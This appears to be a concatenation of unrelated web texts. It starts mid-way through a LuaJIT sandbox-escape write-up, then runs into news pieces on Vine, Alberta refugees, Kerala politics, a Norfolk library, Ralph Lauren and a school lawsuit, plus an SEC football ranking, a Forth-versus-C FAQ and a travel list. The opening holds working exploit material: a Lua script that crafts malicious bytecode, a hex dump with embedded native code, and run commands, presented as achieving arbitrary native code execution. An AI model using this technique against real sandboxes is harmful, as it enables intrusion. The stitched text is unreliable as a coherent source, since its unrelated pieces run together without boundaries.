buf + 5 local function read_uleb128 () local v = p[ 0 ]; p = p + 1 if v >= 128 then local sh = 7 ; v = v - 128 repeat local r = p[ 0 ] v = v + bit.lshift(bit.band(r, 127 ), sh) sh = sh + 7 p = p + 1 until r < 128 end return v ends while true do local len = read_uleb128() if len == 0 then break end local pend = p + len local flags, numparams, framesize, sizeuv = p[ 0 ], p[ 1 ], p[ 2 ], p[ 3 ] p = p + 4 read_uleb128() read_uleb128() local sizebc = read_uleb128() local bc = p local uv = ffi.cast( "uint16_t*" , p + sizebc * 4 ) if numparams == 0 and sizeuv == 3 then uv[ 0 ] = uv[ 0 ] + 2 for i = 0 , sizebc do if bc[ 0 ] == BC.KSHORT then local rd = ffi.cast( "int16_t*" , bc)[ 1 ] if rd <= - 32749 then bc[ 0 ] = BC.KPRI bc[ 3 ] = 0 if rd == - 32749 then bc[ 4 ] = 0 bc[ 8 ] = 0 end end ends bc = bc + 4 end elseif sizebc == 1 then bc[ 0 ] = 147 + numparams bc[ 2 ] = bit.band( 1 + numparams, 6 ) end p = pend end local f = io .open( "evil.lua" , "wb" ) f:write(ffi. string (buf, #estr)) f:close()
If we save the above as make_evil.lua , then we can execute it to create evil.lua :
$ luajit make_evil.lua $ file evil.lua evil.lua: data $ xxd evil.lua 0000000: 1b4c 4a02 060b 0001 0100 0000 0194 0002 .LJ............. 0000010: 000b 0002 0200 0000 0195 0002 000b 0003 ................ 0000020: 0300 0000 0196 0004 0012 0400 0100 0100 ................ 0000030: 0228 0000 004c 0002 0002 0000 5700 010c .(...L......W... 0000040: 0300 0112 2901 0000 2902 0400 2903 0100 ....)...)...)... 0000050: 2904 ffff 4d02 0c80 1806 0001 2d07 0000 )...M.......-... 0000060: 2d08 0100 1209 0000 120a 0500 120b 0500 -............... 0000070: 4208 0400 4107 0002 2001 0706 2d06 0200 B...A... ...-... 0000080: 4206 0101 4f02 f47f 4c01 0200 00c0 02c0 B...O...L....... 0000090: 03c0 8004 3c00 0108 0100 020c 2901 0000 ....<.......)... 00000a0: 1602 0000 1203 0000 2904 ffff 4d02 0680 ........)...M... 00000b0: 1806 0101 2d07 0000 3807 0507 1a07 0107 ....-...8....... 00000c0: 2001 0706 4f02 fa7f 4c01 0200 0880 0680 ...O...L....... 00000d0: 041d 0001 0303 0000 042e 0000 002d 0101 .............-.. 00000e0: 002d 0202 0044 0102 0001 0009 c00a c052 .-...D.........R 00000f0: 0001 0a02 0101 1127 0100 0029 0200 0029 .......'...)...) 0000100: 0303 0029 0401 004d 020b 801a 0600 0021 ...)...M.......! 0000110: 0706 0019 0000 0712 0701 002d 0800 0012 ...........-.... 0000120: 0906 0042 0802 0226 0108 072d 0701 0042 ...B...&...-...B 0000130: 0701 014f 02f5 7f4c 0102 0001 c003 c005 ...O...L........ 0000140: 8004 9f04 0700 1703 0d0c 7158 0000 8058 ..........qX...X 0000150: 0003 802b 0013 0000 0000 0000 0000 0033 ...+...........3 0000160: 0000 0033 0101 0033 0202 0033 0303 0033 ...3...3...3...3 0000170: 0404 002d 0500 0018 0500 0518 0501 051a ...-............ 0000180: 0502 0517 0603 0516 0601 062b 0604 0012 ...........+.... 0000190: 0702 0012 0806 0029 0905 0029 0a08 0042 .......)...)...B 00001a0: 0704 0212 0803 0042 0801 0212 0608 0012 .......B........ 00001b0: 0804 0012 0907 0042 0802 0212 0708 0016 .......B........ 00001c0: 0804 0716 0801 082b 080a 0016 0805 0833 .......+.......3 00001d0: 0905 0012 0a09 0012 0b09 0016 0c06 0542 ...............B 00001e0: 0b02 0216 0b07 0b42 0a02 0233 0b06 0033 .......B...3...3 00001f0: 0c07 0027 0d08 0012 0e0c 0012 0f0b 0027 ...'...........' 0000200: 1009 0042 0f02 0216 0f08 0f42 0e02 0227 ...B.......B...' 0000210: 0f0a 0026 0d0f 0d12 0e0b 0012 0f0d 0042 ...&...........B 0000220: 0e02 0216 0e07 0e16 0e01 0e2b 0e0b 0027 ...........+...' 0000230: 0f0b 0029 1001 0029 110c 0029 1201 004d ...)...)...)...M 0000240: 1004 8012 140f 0012 150f 0026 0f15 144f ...........&...O 0000250: 10fc 7f12 100f 002d 1102 0012 120f 0026 .......-.......& 0000260: 1012 1012 110b 0012 1210 0042 1102 0216 ...........B.... 0000270: 1107 1116 1209 111a 1309 1121 1113 123a ...........!...: 0000280: 1201 0e29 1300 003e 1300 0e19 1301 1119 ...)...>........ 0000290: 1300 133e 1301 0e3a 1301 0e3e 1302 0e3a ...>...:...>...: 00002a0: 1301 0e3e 1303 0e2a 130a 003e 1304 0e3a ...>...*...>...: 00002b0: 1300 0e09 1305 0058 1302 8055 1301 8058 .......X...U...X 00002c0: 13fb 7f12 130c 0012 140b 0027 1509 0042 ...........'...B 00002d0: 1402 0216 140b 1442 1302 0227 140c 0012 .......B...'.... 00002e0: 150c 0012 1611 0042 1502 0227 160c 0026 .......B...'...& 00002f0: 1316 132b 1308 0012 1413 003a 1501 0e12 ...+.......:.... 0000300: 1612 0042 1403 0132 0000 804b 0001 0004 ...B...2...K.... 0000310: c000 8001 c009 0000 0000 0690 1900 0000 ................ 0000320: 0000 0000 0000 0000 0005 0000 00ff ffff ................ 0000330: ff05 0d00 0000 0063 0400 0000 0000 0000 .......c........ 0000340: 0000 0001 8080 c0fe 0701 8080 c099 0401 ................ 0000350: 8080 c08f 0408 1000 3020 f82a 8040 8140 ........0 .*[email protected]@ 0000360: 0088 02d2 0105 0115 0013 001a 2701 0000 ............'... 0000370: 2702 0100 2703 0200 2704 0300 2705 0400 '...'...'...'... 0000380: 2706 0500 2707 0600 2708 0700 2709 0800 '...'...'...'... 0000390: 270a 0900 270b 0500 270c 0a00 270d 0b00 '...'...'...'... 00003a0: 270e 0c00 270f 0d00 2710 0500 2711 0e00 '...'...'...'... 00003b0: 2712 0f00 2713 1000 2714 1100 2601 1401 '...'...'...&... 00003c0: 3302 1200 1203 0200 4203 0101 3200 0080 3.......B...2... 00003d0: 4b00 0100 0011 4865 6c6c 6f20 576f 726c K.....Hello Worl 00003e0: 640a 06c3 0848 8937 0949 8b72 080a ba07 d....H.7.I.r.... 00003f0: 0000 0009 488b 7708 0849 8b3a 0ab8 0a00 ....H.w..I.:.... 0000400: 0000 0ab8 0100 0000 0779 0c0a b84a 0000 .........y...J.. 0000410: 0208 4885 c007 0f05 0aba 0c00 0000 0c48 ..H............H 0000420: 8d35 3300 0000 0abf 0100 0000 0ab8 0400 .53............. 0000430: 0002 094c 8b57 1000 ...L.W..
We can then run evil.lua either in our sandbox, or in luajit proper. Let's start with the latter:
$ luajit evil.lua Hello World
Running evil.lua in our sandbox first requires that we compile and build the sandbox. Ensuring that you link against the correct version of LuaJIT can be fiddly, as can forcing the correct address space layout on OSX. Once your environment is set up correctly, this can be as simple as:
$ gcc sandbox.c -lluajit # On OSX, also pass: # -pagezero_size 10000 # -image_base 100000000 $ ./a.out Hello World
With that, we've seen that malicious LuaJIT bytecode can be used to escape from the tightest of Lua-level sandboxes, and result in arbitrary native code execution.
With Twitter's future still in question following failed attempts at finding an acquirer and the recently announced layoffs of nine percent of its workforce, the company today announced it's shutting down its standalone short-form video app, Vine. According a post, nothing is changing immediately — the website and apps will remain online for the time being, and users will be given a chance to download their Vine videos ahead of its official closure.
The announcement was devoid of any explanations about what led to the decision, only stating that Twitter would share more news on its blog and via its official Twitter account in the future regarding what comes next.
While the plan is to wind down Vine's operations, Twitter also says the website will remain online because the company thinks “it's important to still be able to watch all the incredible Vines that have been made.”
However, it's unclear at this time how long the site will live on, given Twitter's plans.
In recent days, Twitter has been focusing more on its Periscope product and live streaming rather than the short looping video service Vine, which is home now to a number of creators. It even integrated live streaming into the service, offering to alert users when someone you follow goes live. It has also focused heavily on live TV, via partnerships to stream televised content with organizations like the NFL, Bloomberg and others.
The team had already had a spate of departures and all three co-founders previously left. And it seems there's still some frustration about the way Twitter has handled the product.
Vine co-founder Rus Yusupov just tweeted:
Don't sell your company! — Rus (@rus) October 27, 2016
Acquired by Twitter in 2012, Vine started off strong, becoming the No. 1 app on the iTunes App Store only six months after joining the company. At one point, Vine had more than 200 million active users, yet it struggled to maintain traction and saw a decline in popularity in recent months.
Competition from Instagram, Snapchat and YouTube made it difficult to stand out from the pack. According to data from App Annie, Vine has since dropped to No. 284 in the top charts for free applications on iOS, down from the low 100s at the beginning of the year. It's still fairly well-ranked (No. 24) in the Photo & Video category, but hasn't placed on the Entertainment apps top charts since 2015.
Year-over-year worldwide downloads of the Vine app declined 55 percent in Q3 across both the Apple App Store and Google Play, according to Sensor Tower's data.
This is just the latest social media app to throw in the towel. Selfie app Shots, recently rebranded as Shots Studios and is looking to create YouTube content with former Vine stars.
A large majority of immigrants to Alberta integrate into the workforce within a few years of landing, new data from Statistics Canada show.
According to the data — compiled from administrative, immigration and tax records up to the 2014 tax year — around 60 per cent of refugees that landed in 2014 had employment income.
However, that number grows to about 80 per cent for those who had been in the province for a year.
"That's right where the typical non-refugee person is too," said Trevor Tombe, an economist at the University of Calgary.
The numbers do not not include refugees who started their own businesses or had self-employment income.
They also do not take into account the economic downturn or the influx of Syrian refugees into the province that began in late 2015.
Eritrean refugee Yonas Hiale Solomon has been in Calgary since last March.
"Now I think there's no work, not easy find a job, very hard, economy, the payment is very small payment," they said after picking up their wife from their English classes.
'General pattern'
New refugees in Alberta integrate quickly into the labour market. Employment income grows steadily after landing (~9%/yr). <a href="https://twitter.com/hashtag/ableg?src=hash">#ableg</a> <a href="https://t.co/h68FIOl8hd">pic.twitter.com/h68FIOl8hd</a> —@trevortombe
Tombe said Solomon's wages should improve with time.
"I think the general pattern is pretty clear that from the point when a refugee arrives in Canada, the income is fairly low ... but that grows fairly rapidly," they said.
"The average refugee, very quickly, begins earning employment income."
The share of Alberta refugees w/ employment income reaches about 80% within a couple years of landing. Equivalent to non-refugee pop. <a href="https://twitter.com/hashtag/ableg?src=hash">#ableg</a> <a href="https://t.co/ViLi1LGemj">pic.twitter.com/ViLi1LGemj</a> —@trevortombe
It's a similar story for other immigrants, including skilled workers, family members sponsored by Canadian citizens and business immigrants.
On average, however, refugees earn less than other immigrants — a difference Tombe suggested could be related to challenges with language skills.
"This will certainly limit one's earnings ability in the labour market, and refugees — not surprisingly — face the biggest challenge in this regard," they said.
"But this should dissipate through time."
Best outcomes in Alberta
Across the country, Tombe says the earning patterns of refugees are fairly similar.
"It's true for Canada as a whole that employment income rises at a pretty rapid rate from the moment that a refugee arrives through time. It's also true that the share reporting employment income rose pretty quickly after landing," they said.
Tombe said refugees in Alberta have the best outcomes in terms of employment income.
"[It's] much higher among refugees in Alberta than in other provinces," they said.
"We also have the highest employment rate, the lowest social assistance rate, and that's true just because Alberta has the strongest economy, even today, in the country."
Last week's power rankings caused quite a stir with Florida getting the top spot. Alabama and Florida both had quality wins this past weekend with Alabama dominating in Knoxville and Florida embarrassing a very good South Carolina team at home. The reality is that it doesn't matter where these two teams rank in relation to each other, because if they win out, they will play each other in Atlanta.
But, for the sake of power rankings based on what each team has accomplished on the field, disregarding preseason ranking, we keep Florida at #1 this week and Alabama at #2. The rest of the Big 5 has some changes. It's also important to realize that we don't necessarily penalize a team for how good they look winning. Every championship team that comes out of this conference tends to have a few games where they have to merely survive. Often these games are ugly. With the brutal week-in and week-out schedule of an SEC team, winning is winning.
Currently, five teams control their own destiny in the SEC. These teams are Florida, Alabama, Georgia, LSU and Mississippi State. You keep winning, you win the conference and will play for a national title. South Carolina has fallen off this list with its second loss of the season.
1. Florida Gators (7-0)
Florida took another step on Saturday proving they are a legitimate title contender. They utterly dominated the Gamecocks in Gainesville starting with big plays on defense. An incredible punter kept the field position game in favor of Florida all day, and the Florida offense was efficient, scoring touchdowns after getting turnovers.
The Florida secondary is something special this season. They are fast and physical and are locking down passing games. In games against LSU and South Carolina, Florida did not allow a single touchdown.
Ranked wins: at #20 Texas A&M, #6 LSU, #13 South Carolina
Key games remaining: #10 Georgia, #12 Florida State
Interesting Stat: Driskel's 4th quarter passing numbers: 11 of 15 (73.3%), 2 TD, 0 INT. Florida's 4th quarter passing defense numbers: 29 of 78 opponent's completions (37.2%), 0 TD, 2 INT.
Did you know: Driskel has more wins over top 25 ranked opponents in six starts (3) than Georgia's Aaron Murray has in three seasons (2).
2. Alabama Crimson Tide (7-0)
Alabama once again methodically took care of business against an inferior team in Tennessee. They looked like the varsity team, and Tennessee looked like the junior varsity team. This team is just outstanding, and their quarterback might be a Heisman finalist.
The balance of this team is exceptional. The team does the little things right as you would expect from a Nick Saban coached team. They will be tough to beat. Alabama's offense may be peaking at just the right time.
Ranked wins: #22 Michigan
Key games remaining: #11 Miss State, #6 LSU, #20 Texas A&M
Interesting Stat: Alabama is #1 in the country in scoring defense with only 8.3 points per game given up.
Did you know: Vegas ranks the center as the most important position behind the quarterback. Alabama center Barrett Jones is one of the best in the country.
3. LSU Tigers (7-1)
Despite a loss in Gainesville a few weeks ago, Les Miles has their team rebounding with quality ranked wins over South Carolina and on the road at Texas A&M. As I stated before, winning is winning, and the tough teams win the ugly games. LSU is still in this thing, and with the crazed home crowd at night in Baton Rouge in two weeks, don't think that they will roll over when the Crimson Tide come to town.
LSU does have concerns. The offensive line has been banged up this year. The losses of the Honey Badger and Morris Claiborne to the NFL draft clearly left a playmaking ability hole. The defensive line and the running backs are as good as it gets, but I'm not sure if it's enough to beat Alabama. Also, LSU's Kevin Minter (LB) is having an all-world season.
Ranked wins: #13 South Carolina, at #20 Texas A&M
Key games remaining: #1 Alabama, #11 Miss State
Interesting Stat: LSU is currently converting 38% of their third downs which is down from 45% last season.
Did you know: Les Miles is 6-2 off a bye week as the LSU Head Coach. Against Nick Saban off a bye week? 3-0.
4. Mississippi State Bulldogs (7-0)
Mississippi State is still undefeated. I really like how this team is playing. They're tough, and they play good defense. Finally, we get to see them against real competition. They have to go to Tuscaloosa this week. Most don't expect Alabama to lose this game, but I want to see how Miss State handles this game. While a loss would still be a loss, if Mississippi State plays the Tide tough, it could still be a good step for this program.
Ranked wins: None
Key games remaining: at #1 Alabama, #20 Texas A&M, at #6 LSU
Interesting Stat: Mississippi State has a +17 turnover margin which leads the country.
Did you know: Mississippi State beat Alabama in Nick Saban's first year as the Alabama Head Coach in 2007. The score was 17-12.
5. Georgia Bulldogs (6-1)
Georgia seems to be struggling, especially defensively, but they're still in the game. A win against Florida changes the perception of this program from the past month instantaneously. For now, this is the team on this list that seems to be lacking the toughness element. Georgia safety Shawn Williams recently called their team out in this regard. Perhaps a rivalry game down in Jacksonville is what is needed to right the ship?
Ranked wins: None
Key games remaining: #2 Florida
Interesting Stat: In the last two games, Georgia has given up 230 rush yards to South Carolina and 206 rush yards to Kentucky.
Did you know: The student body president of the winning school of the annual Florida-Georgia game is given the “Okefenokee Oar.” It's a 10-foot long oar carved from a tree from the OKefenokee Swamp which straddles the Florida-Georgia border. This started in 2009, and no trophy is presented to either team at the actual game.
* All rankings based on the current BCS rankings
Photo credit: Thomas Campbell-US PRESSWIRE
Forth Versus C
2004 Apr 04
Some IAQs ( Infrequently Asked Questions ) about Forth and C.
Q. What is Forth?
A. Forth is a computer programming language which has a return stack, an explicit parameter stack and a dictionary. It features an incremental compiler, an interpreter and a very fast edit-compile-test cycle. Forth is extensible.
Q. What is C?
A. C is a computer language which has a single, implicit stack. It features a “tool set” that includes a batch-mode pre-processor, compiler, linker and makefile program. It also features a binary ( pre-compiled ) distribution system using libraries and header files. C is not extensible.
Q. Why is Forth not as widely used as C?
A. C is much better suited to most business environments.
Q. So why use Forth?
A. Because it is possible to write better programs in Forth than in C.
Q. Could you define “better” in this context?
A. Easier to read and maintain, fewer bugs, smaller, faster development.
Q. So why doesn't everyone use Forth?
A. Because it is also possible to write worse programs in Forth than in C.
Q. Perhaps you should also define “worse” …
A. Impossible to read and maintain, more bugs, bigger, longer development.
Q. Why is this?
A. Because Forth does not impose any restrictions on what you do or how you do it. However large your C program gets the source for it will still be C. Since Forth is extensible, you can extend the language so that part of your program can be written in a superset of Forth, specifically tailored to the application.
Q. Doesn't this mean that you have to learn what is essentially a new language for every application?
A. Yes.
Q. And this doesn't worry you?
A. If the “new language” maps exactly onto the problem domain, what you are learning about is the problem, and then describing the solution becomes trivial.
Q. What about if the “new language” does not map to the problem domain?
A. You are in big trouble! The worst programs are those where an entirely new language is created independently of the problem, and then the problem is solved using this new language. You then really do have to learn a new language and­ the problem domain. This is actually much worse than programming in C, where at least you already know the language.
Q. How do you make sure that your Forth programs map to the problem domain?
A. Feedback. Ask the people who understand the problem domain if the program is right. Non-programmers can spot deviations from reality better than programmers, who usually immerse themselves in too much detail.
Q. But how can a non-programmer even read a program, let alone tell whether it is right?
A. Forth syntax can be learnt in an hour or two. If the top level of the program cannot be read and understood by someone who understands the problem domain, it is wrong and you should change it.
Q. How much faster can you develop programs in Forth compared to C?
A. This depends on the type of application and what is already available. Almost all programs are not so much written as “ported” from similar programs. It is very unusual to see the same application written in both Forth and C, so comparison of development times must be anecdotal. For embedded, non-multitasking applications I would put the ratio of Forth:C development times at around 1:2 to 1:3. For embedded multitasking applications at between 1:4 to 1:6, and for PC based Windows applications about 1:4. Others have suggested figures of 1:10 or even higher. I think 1:pi is about right.
Q. You are claiming that you can finish a program three times more quickly in Forth than C. How can this be true?
A. The difference is not only in the language syntax - you can convert Forth code into C and back relatively easily. It is possible to develop code in a C-like way in Forth, but it is not possible to develop code in a Forth-like way using the C tool set.
Q. What is it about the C tool set that stops you programming in a Forth-like way?
A1. The C language and tool set operate in a batch mode. The time taken to edit source, build and download is not usually less than a number of seconds. Because Forth compiles incrementally and has an interpreter and explicit stack, changes can be tested immediately. The turn-round speed is actually more important than most people realise.
A2. The lack of an interpreter in C means that code must be tested using “printf”, a source level ICE/debugger or a special test harness or Command Line Interpreter. All of these techniques add to the complexity of the system. Forth has an interpreter, and this combined with the explicit stack means that you can enter arguments and test any function at any time.
A3. Forth is extensible, so you can create a superset of Forth which describes your problem domain exactly.
Q. I have seen versions of Forth written in C. Doesn't this mean that you can get all of the advantages of Forth, but written in C?
A. No. The real power of Forth lies in the synergy of the entire system. You can certainly gain an interpreter, but at the expense of a duplicate set of tools, two file formats, and two languages to learn before you even start on the application.
Q. Does Forth have any known weaknesses?
A. Yes. There is no support within the Forth language for version control. C provides pre-compiled libraries and header files which allow vendors to supply their code in a form that cannot be modified by the customer. This is a simple but effective version control system. Many Forths are supplied with a similar binary module system but this is an extension to the language.
Q. Does Forth have any perceived weaknesses?
A1. Yes. Because Forth is so simple, many people have written their own.
In fact it is almost mandatory that computer science students spend an afternoon writing a Forth, just to see how easy it is. Not surprisingly, not all Forths are created equal. The finely honed products available from Forth, Inc., MPE Ltd and other commercial vendors are vastly better than most of the free Forths available on the WWW. Specifically, with advances in native compiler technology, Forth is no longer slow.
A2. Forth is sometimes accused of being cryptic or “read only” code. This is because there is a lot of cryptic, “read only” code written in Forth. If you are going to use Forth, you must control its use, and ensure that your code is easy to read. This is a project management issue.
A3. Forth uses “Reverse Polish” notation. This is because the problem domain that the Forth system is addressing is “how to tell the computer what to do”. The simplest way to solve this problem is to give the computer its instructions in the order that it needs them. The code “1 2 +“ tells the computer to put a 1 on the stack, put a 2 on the stack and add them. The fact that the rest of the world ( HP calculators excepted ) write “1 + 2” is because this shows the operator and its arguments in a graphical way, as written on a chalkboard. It is easy to write a Forth parser that converts “1 + 2” into “1 2 +”, but this would put a boundary onto the Forth system that would make further extensions to the language much more difficult. Reverse Polish is seen as antiquated, and the fact that the computer has not even been taught to understand common usage is interpreted as a major weakness. In fact, it is just that Forth is not attempting to solve an entirely different problem.
A4. Forth is perceived as a “dead” language. This is because it is not being championed by big companies, nor is it taught as the de facto standard in most computer science courses. In fact Forth is alive and well in many low-profile niche markets, usually where resources are limited, software must be reliable or there is a need for an interpreted “scripting language”.
One limited resource is often money - short development times mean reduced costs. Smart cards and space environments are examples of restricted hardware where Forth flourishes.
Q. Why has Forth been described as “a polarising language”?
A1. People either love Forth or hate it. It is easy not to like Forth. Programmers don't like Forth because it is not fashionable ( at the time of writing ) and does not look good on a CV. Project managers don't like Forth because they can't get Forth programmers easily, and the quality of code depends critically on the programmer. University lecturers don't like it because there is not enough that can be taught about Forth that can be examined. Software vendors don't like Forth because it removes the complexity they need to survive. Users don't like Forth because they have never heard of it.
A2. People either love Forth or hate it. It is easy to like Forth. Programmers like Forth because its fun – you remove the tedious 66% of the job. Project managers like Forth because they can get the project finished on time, with fewer, easier-to-find bugs. University lecturers like Forth because they can teach their students about the art of programming and be involved in the cutting edge of computer science. Software vendors like Forth because they get involved with their customers to help them solve their problems and refine their products at the same time. Users like Forth because it makes programs that work.
Q. So you like Forth then?
A. Yes.
Q. What about C?
A. I have nothing against C – it is a language specifically tailored to the problem domain of “writing C based operating systems”. Unix/Linux and DOS/Windows are written in C and are immensely successful.
“If your only tool is a hammer, all problems become nails”. For those applications that are not operating systems, Forth is probably a better language to use than C.
Q. Is that it?
A. Yes!
Howerd Oakford 2004 Apr 04
Thiruvananthapuram: The BJP-led NDA alliance in Kerala has promised to bring socially and economically marginalised communities into the mainstream if voted to power. On Saturday, Union Minister Arun Jaitley unveiled an ‘action plan' for the NDA, an alliance of 10 parties that includes Ezhava party Bharat Dharma Jana Sena, which focuses on Dalits, tribals and the backward communities.
[related-post]
Advertising
The action plan, essentially a manifesto, said all landless families would be allotted land within two years and that the alliance would launch a “second phase of land reforms”. A special package of Rs 10,000 crore for traditional industries and special welfare schemes for workers in traditional industries and fishermen are some of the highlights of the package. It also said 1,000 engineers, 500 teachers, 100 doctors and 50 civil servants would be groomed from among the tribal communities. All tribals, who have passed Class X, would be given government jobs. In a bid to woo upper caste Hindus, the action plan has mooted scholarship for economically backward students from this caste.
Speaking on the occasion, Jaitley said the days of bi-polar elections are over in Kerala. “The LDF and the UDF were together in Delhi during the first UPA regime. In West Bengal, 30 years of Left rule have forced that Front to go for an alliance with the Congress. The more Kerala gets to tri-polar elections, the closer the Left and the Congress will become,'' they said.
Amit Shah cancels Kerala visit
BJP president Amit Shah, who was to kick off their campaign tour of Kerala Sunday, cancelled their visit due to illness. Shah was scheduled to address three rallies — two in Thiruvananthapuram and one in Kollam district.
WATCH INDIAN EXPRESS VIDEOS HERE
The new Slover Library officially opens at 10 a.m. January 9, 2015 with the First Book Checkout ceremony with Mayor Paul D. Fraim, Jane Batten, major donors and the Slover Library Foundation.
There is a Grand Opening celebration weekend planned January 10 and 11. The library hours for the celebration are 10 a.m. to 5 p.m. on Saturday and 1 p.m. to 5 p.m. on Sunday. The celebration events are free and open to the public including Dr. Seuss-inspired activities, games, entertainment and even The Cat in the Hat! The Grand Opening celebration is sponsored by TowneBank, Cox, Pilot Media and WHRO. A complete schedule of Grand Opening events will be available at sloverlibrary.com.
Slover Library is the new model for public libraries, and it will be one of the most innovative ones in the country. “Slover Library will become a new destination for the region,” said Mayor Paul D. Fraim. “We anticipate it will be a venue for social exchange and interaction and an invigorating place to learn about our world and our history.”
The $65 million Slover Library encompasses three centuries of architecture: the historic Seaboard building (1800s), the Selden Arcade (1900s), and a new six-story tower that connects them all. Newman Architects from New Haven, Conn. designed the 138,000-square-foot jewel that showcases traditional library functions with innovative technology, stunning ornamentation and engaging community spaces.
“Simply stated, Slover Library will be one of the finest libraries – anywhere,” said Harry Lester, president of Slover Library Foundation. “Today's exceptional libraries are more than books, history and technology. The Slover provides our region with a centrally located, extraordinary place that will encourage community engagement and promote thoughtful conversations on issues important to our 1.7 million residents. It will be a place to participate in local democracy.”
The spaces at Slover Library are varied and offer something for everyone. Slover has books, but it is also a place to relax with a magazine or newspaper, catch up with a friend and meet over lunch or a cup of coffee. Slover offers rooms for events and meetings that can be reserved, touchscreens that enable you to research your family tree, computer and lab rooms, even space and equipment to produce your own video. And, to fully enjoy the big-city experience, the library offers downtown views from terraces and al fresco patio dining.
HIGHLIGHTS & FEATURES
More than 160,000 books and other items available to borrow
Digital Media Lab to design and produce digital content, 3D printer, large-format printer, and Adobe software
Multi-touch interactive experience showcasing the Sargeant Memorial Collection, the premier source for local history on the East Coast, with thousands of pieces of searchable photos and artifacts
Digital displays located on the book shelves to access the library catalog and your account
130 public access computers with internet access
Free Wi-Fi
Self Check-out
Classes and events from genealogy classes to children's programs for people of all ages
Architectural ornamentation on exterior, Forum roof and third-floor terrace by Kent Bloomer
Cuisine at Slover, a 52-seat casual bistro with additional outdoor seating
Space to convene up to 250 people for community conversations, events and programs
In 2008, Frank Batten Sr. donated $20 million for a new main public library to be named after their uncle Colonel Samuel Slover to recognize their contributions to the City of Norfolk. The Batten Foundation donated an additional $20 million. Slover was the founder of Landmark Communications and a former Mayor of Norfolk. Slover loved Norfolk, and they believed that an informed citizenry is one of the most important keys to its success. In 1954 at the age of 27, Frank Batten Sr. assumed the leadership of the Virginian-Pilot and the Ledger Star, which were owned by Landmark Communications. With strategic acquisitions and key investments, Batten developed Landmark Communications into one of the nation's largest and most influential media companies. The City of Norfolk committed $22.6 million to Slover Library, and the remainder was collected from private contributions through the Slover Library Foundation.
Slover Library, located at 235 E. Plume Street in Norfolk, will offer computers, internet access, interactive displays and a digital media lab. Collections will include adult popular fiction and nonfiction, a youth library and learning center, and teen services in a casual environment and access to popular teen offerings. Additionally, the community will be able to access high-tech civic meeting rooms and the important Sargeant Memorial Local History and Genealogy Collection. Slover Library will be among the most technologically advanced public libraries in the country. The library will be open Monday through Thursday 10 a.m. to 9 p.m., Friday and Saturday, 10 a.m. to 5 p.m. and Sunday, 1 p.m. to 5 p.m. For information visit www.sloverlibrary.com or call 757-664-READ (7323).
Update Since it was founded in 1967 out of a desk drawer, Ralph Lauren has served as the designer and CEO of their namesake label. Though it was their brother Jerry's idea to change their name from Lifshitz, the name "Ralph" has resonated across generations, fashion senses, and countries as the utmost in excellence when it comes to men's fashion. Today, in what the the company is terming "an executive shuffle," Ralph Lauren announced that they are vacating the role of CEO. According to the New York Times, Ralph says they want to remain active at the company they founded in new roles as executive chairperson and chief creative officer. Their replacement? Stefan Larsson, Global President of rising giant retailer Old Navy, whose turnaround we reported earlier this year. Larsson, the Times reports, will report to Mr. Lauren, though Ralph noted their relationship as a “partnership.” The reasons for Ralph's sudden departure are unknown, but one thing is certain: As long as their name is on the tag, their legacy will never be forgotten.
A Minnesota charter school agreed to pay a family $120,000 after the parents of a 5-year-old transgender boy accused the school of violating their child's rights by failing to protect them against bullies, CBS reported Tuesday.
The civil discrimination lawsuit charges Nova Classical Academy with gender discrimination. The parents argued that the school didn't do enough to prevent the alleged jabs and bullying their son experienced because they wanted to act and dress like a girl, according to CBS Minnesota.
The boy's father said the teachers initially tried to be accommodating, but the school's leaders got in the way. To save time and money, the two sides settled rather than going to court, with the school agreeing to gender neutral uniforms, policy changes to allow students who don't identify as their birth gender to express themselves, and staff training on how to best accommodate transgender students, in addition to paying $120,000 to the family.
“They in some ways had no choice,” said Lisa Stratton, the family's attorney and lead counsel for the Gender Justice advocacy group. “Those things are not small and that kind of awareness creates a welcoming environment and we're really excited that's going to be happening at Nova.”
The Minnesota Department of Education also released a toolbox of model transgender policies in late July, saying students should be able to use whichever restroom they want.
“It's best practice for schools to do that training on bullying, on harassment, on the various non-discrimination laws on an annual basis,” school attorney Laura Booth said after the settlement.
The transgender boy no longer attends Nova Academy. Neither CBS Minnesota nor Lisa Stratton responded to The Daily Caller News Foundation's request for comment in time for publication.
Follow Grace on Twitter.
Content created by The Daily Caller News Foundation is available without charge to any eligible news publisher that can provide a large audience. For licensing opportunities of our original content, please contact licensing@dailycallernewsfoundation.org.
Visit here on Obscura Day! (Photo: Jen Lukehart)
Spoiler alert: we're all going to die. But we need not despair, because we're not alone! In fact everything dies in its time. As the universe slips elegantly and inexorably towards entropy, even our goods and possessions become distressingly irrelevant and riddled with decay, experiencing a sort of life cycle of their own. And just like with living beings, inanimate objects have graveyards all their own. All across the world, planes, trains, automobiles, phones, and even spaceships have been discarded in less than sentimental makeshift cemeteries. There may not be any epitaphs or flowers, but these eight material graveyards are no less beautiful than any human boneyard.
1. GREAT TRAIN GRAVEYARD
Uyuni, Bolivia
The Great Train Grave-Robbery. (Photo: SkareMedia)
Sitting out on the world's largest salt plain, is the final resting place of a number of 20th century locomotive that are slowly falling apart in the salty wind. Left to die in the barren Bolivian salt wastes by their former British owners who created the tracks that run through the area, the trains now serve a more beneficial function than when they were in operation. The rusting hulks are now one of the leading tourist attractions in the area, drawing much needed travel dollars to the area. The old trains have long since been stripped and vandalized, but these remain some beautiful corpses.
These trains never looked this good in life. (Photo: SkareMedia)
That sunset is being a bit showy. (Photo: SkareMedia)
2. BAY OF NOUADHIBOU SHIP GRAVEYARD
Nouadhibou, Mauritania
Ghost ship. (Photo: jbdodane on Flickr)
Sitting off the coast of Mauritania's Bay of Nouadhibou are an army of deteriorating ships that were simply abandoned because it was cheaper than taking them apart. Generally when ships are put out to pasture, they are broken down so they don't contaminated the waters as they decay. However this process isn't cheap and in Nouadhibou, the lax governmental controls on the procedure led to a number of cheapskate owners of these vessels simply sail them into the bay and walk away. However this corruption has resulted in a beautiful breakwater made of dead boats. while there has been some negative environmental impact, some of the ships have also become home to a variety of species of fish. As always death fuels life.
Ships. Wrecked. (Photo: Sebastián Losada on Wikimedia Commons)
Go home, boat. You're drunk. (Photo: Sebastián Losada on Flickr)
3. FAST FIBERGLASS MOLD GRAVEYARD
Sparta, Wisconsin
That mouse will eat your dreams. (Photo: Jen Lukehart)
